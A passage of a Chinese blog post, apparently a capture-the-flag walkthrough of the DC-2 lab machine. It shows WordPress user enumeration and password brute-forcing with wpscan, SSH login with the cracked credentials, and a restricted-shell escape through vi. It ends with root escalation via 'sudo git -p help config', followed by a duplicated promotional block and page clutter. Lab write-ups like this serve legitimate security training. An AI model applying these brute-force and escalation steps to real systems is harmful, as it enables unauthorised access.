DC-2靶机详解,2024年最新2024网络安全架构面试指南

接下来使用一个工具 WPScan,同样 kali 自带

wpscan --url http://dc-2 --enumerate u
wpscan --url http://dc-2 --passwords out.txt

Desc:
这里提供的是两个 WPScan 工具的命令:

    wpscan --url http://dc-2 --enumerate u: 
    这个命令的目的是扫描位于 http://dc-2 的WordPress网站,并且通过 
     枚举用户来收集关于该WordPress网站的用户信息。具体来说, 
     --enumerate u 参数告诉WPScan枚举用户信息。

    wpscan --url http://dc-2 --passwords out.txt: 
    这个命令的目的是对位于 http://dc-2 的WordPress网站进行密码破解 
     尝试。--passwords out.txt 参数告诉WPScan使用 out.txt 文件中的 
      密码列表进行尝试。

爆破结果,存在2个账户

Username : jerry
Password : adipiscing

Username : tom
Password : parturient

这里可以用dirb工具扫一下有哪些可以登录的页面

dirb http://dc-2/

找到了 就是这个
http://dc-2/wp-admin/  

在这里插入图片描述

使用账号 jerry 登录后可以发现 flag2

鸟语:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

说人话

不要在搞wordpress了,去找找其他线索、切入点

flag 提示,如果 wordpress 打不下来,就得换一个入口

上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token

wpscan --url http://dc-2/ --api-token 这边填你的APIToken

我看了一下,大部分需要认证,并且都是 XSS 之类的,靶机这环境根本没用,有一个 WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution 可以试一试,反正也有账号

根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点


flag3

既然打不下来 wordpress ,就换一个,联想到端口扫描出的 7744 SSH 服务,这里可以作为突破口

使用刚才的爆破出来的两个账号密码去尝试连接一下ssh

爆破结果

Username : tom
Password : parturient

直接登录

ssh tom@192.168.197.146 -p 7744

看来是个受限制的 shell 环境,rbash,使用compgen -c 查看当前用户下可以查看哪些命令

可以看到我们能使用 less 和 vi ,less 查看 flag3

less flag3

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

翻译

可怜的老 Tom 总是追随 Jerry。 也许他应该承受自己造成的所有压力。

这里提示了之前爆破出的2个 web 用户,会不会 linux 也有这2个用户?查看 passwd 文件

less /etc/passwd

可见 jerry 用户存在,那么下面就是 rbash 逃逸–>提权


flag4

使用 vi 进行逃逸

vi

:set shell=/bin/sh
:shell

Desc:
    :set shell=/bin/sh:这个命令将 Vi 编辑器的 shell 设
    置为 /bin/sh,这意味着在 Vi 编辑器中执行外部 shell 命
    令时将使用 /bin/sh。
    :shell:这个命令会启动一个新的 shell,让你可以在 Vi
     编辑器之外执行命令。在这个新的 shell 中,你可以执行任
     何标准的 shell 命令,然后通过输入 exit 或者按下  
     Ctrl+D 返回到 Vi 编辑器。

更改环境变量,把 /bin/sh 目录加进去,不然许多命令不好用

echo $PATH
export PATH=$PATH:/bin:/usr/bin

Desc:
 echo $PATH:这个命令用于打印当前 shell 中的环境变量 $PATH
  的值。$PATH 是一个用冒号分隔的目录列表,其中包含了系统在
  搜索可执行文件时要查找的目录。每当你输入一个命令时,系统 
   会 在 $PATH 中列出的目录中查找这个命令的可执行文件。

export PATH=$PATH:/bin:/usr/bin:这个命令将当前 $PATH
 的值与 /bin 和 /usr/bin 目录结合起来,并将结果重新分配给
  $PATH。这意味着系统将在 /bin 和 /usr/bin 目录中查找命令
  可执行文件,即使它们不在默认的 $PATH 中

ok,现在是正常的 shell 环境了,在提权之前,尝试登录 jerry 用户

su jerry

这里可以看到Jeryy只能使用git 那么答案就很明显了要使用git来最后的提权
在这里插入图片描述

Good to see that you’ve made it this far - but you’re not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you’re on your own now. 😃

Go on - git outta here!!!

机翻

很高兴看到你已经做到了这一点-但你还没有回家。

你仍然需要获得最终标志(唯一真正重要的标志!!!)。

这里没有提示-你现在就一个人了。 😃

继续-git outta here !!!


这里提到了 git,那么就用它提权

---

# flag5


```bash
sudo git -p help config
!/bin/sh

cd
cat final-flag.txt



**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/09732889594200e0364ce2be706a2009.png)
![img](https://img-blog.csdnimg.cn/img_convert/5870d3ce9757d78a09d2cb84f40c7bc1.png)
![img](https://img-blog.csdnimg.cn/img_convert/ab74224edae5ddbaf1271d41666d14ca.png)
![img](https://img-blog.csdnimg.cn/img_convert/d7209c6b0d71e09a91105309e4faee3f.png)
![img](https://img-blog.csdnimg.cn/img_convert/cef7c778fc45ff6fdc76d66b0adc15db.png)
![img](https://img-blog.csdnimg.cn/img_convert/2dfd96ea557403e1888cb92121d9d569.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**

**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**

**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
![img](https://img-blog.csdnimg.cn/img_convert/98b89a22d5c8f4c2d2350ee1098b2b01.png)



### 给大家的福利


**零基础入门**


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


![](https://img-blog.csdnimg.cn/img_convert/95608e9062782d28f4f04f821405d99a.png)


同时每个成长路线对应的板块都有配套的视频提供:


![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a91b9e8100834e9291cfcf1695d8cd42.png#pic_center)


因篇幅有限,仅展示部分资料


网络安全面试题


![](https://img-blog.csdnimg.cn/img_convert/80674985176a4889f7bb130756893764.png)


绿盟护网行动


![](https://img-blog.csdnimg.cn/img_convert/9f3395407120bb0e1b5bf17bb6b6c743.png)


还有大家最喜欢的黑客技术


![](https://img-blog.csdnimg.cn/img_convert/5912337446dee53639406fead3d3f03c.jpeg)


**网络安全源码合集+工具包**


![](https://img-blog.csdnimg.cn/img_convert/5072ce807750c7ec721c2501c29cb7d5.png)


![](https://img-blog.csdnimg.cn/img_convert/4a5f4281817dc4613353c120c9543810.png)

**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~




**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
![img](https://img-blog.csdnimg.cn/img_convert/ddbb1e2ae1a30abc772a8d36bb9d83af.png)

5072ce807750c7ec721c2501c29cb7d5.png)


![](https://img-blog.csdnimg.cn/img_convert/4a5f4281817dc4613353c120c9543810.png)

**所有资料共282G**,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~




**一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中...(img-1IdRGQzL-1712947489312)]

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值